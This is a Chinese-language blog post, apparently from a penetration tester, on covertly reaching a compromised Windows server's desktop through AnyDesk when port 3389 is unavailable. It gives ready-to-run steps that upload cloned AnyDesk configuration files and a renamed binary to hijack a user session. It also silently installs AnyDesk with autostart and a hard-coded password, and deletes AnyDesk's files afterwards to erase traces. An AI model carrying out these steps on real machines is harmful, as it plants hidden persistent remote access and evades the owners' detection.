未开启3389实现远程桌面


适用前提:

目标服务器出网。当前为system权限或用户权限

适用场景:

目标靶机无法通过3389登录用户桌面。

使用的工具:

anydesk

如何使用:

1、存在session,登录这个session用户的桌面
先下载AnyDesk
打开AnyDesk设置好密码,以及记住你的连接地址(下图打码部分)。






退出本地的AnyDesk,然后到c:\Users\{USER}\AppData\Roaming\AnyDesk目录下将ad.traceservice.confsystem.confuser.conf这个4个文件上传到目标的c:\Users\{目标在线的用户}\AppData\Roaming\AnyDesk目录下。


将AnyDesk也上传到目标服务器(任意目录都行,最好修改一下文件名)。然后以在线的那个用户的权限去执行AnyDesk这个程序。最后删除本机的前四个文件配置文件(不删除就相当于有两个一样的地址,就不知道是连接的谁),启动本机的AnyDesk输入一开始你AnyDesk的连接地址,连接成功后输入前面设置的密码即可。

2、不存在session。(需要管理员权限,且需要用户的明文密码)

安装AnyDesk
C:\AnyDesk.exe --install "C:\AnyDesk" --start-with-win --silent 
设置密码
echo 8JEASPsPXtlEi0ZX | "C:\AnyDesk\AnyDesk.exe" --set-password
获取id的bat(其实Anydesk可以直接用ip连接,在靶机不出网时比较实用,可惜不能使用PTH)
@echo off
for /f "delims=" %%i in ('"C:\AnyDesk\AnyDesk.exe" --get-id') do set CID=%%i 
echo %CID%

清理痕迹

C:\AnyDesk\AnyDesk.exe --remove  --silent
del /q C:\AnyDesk
rd C:\AnyDesk
del /q C:\ProgramData\AnyDesk
rd C:\ProgramData\AnyDesk

声明:john'blog|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - 未开启3389实现远程桌面


欢迎来到脚本小子的博客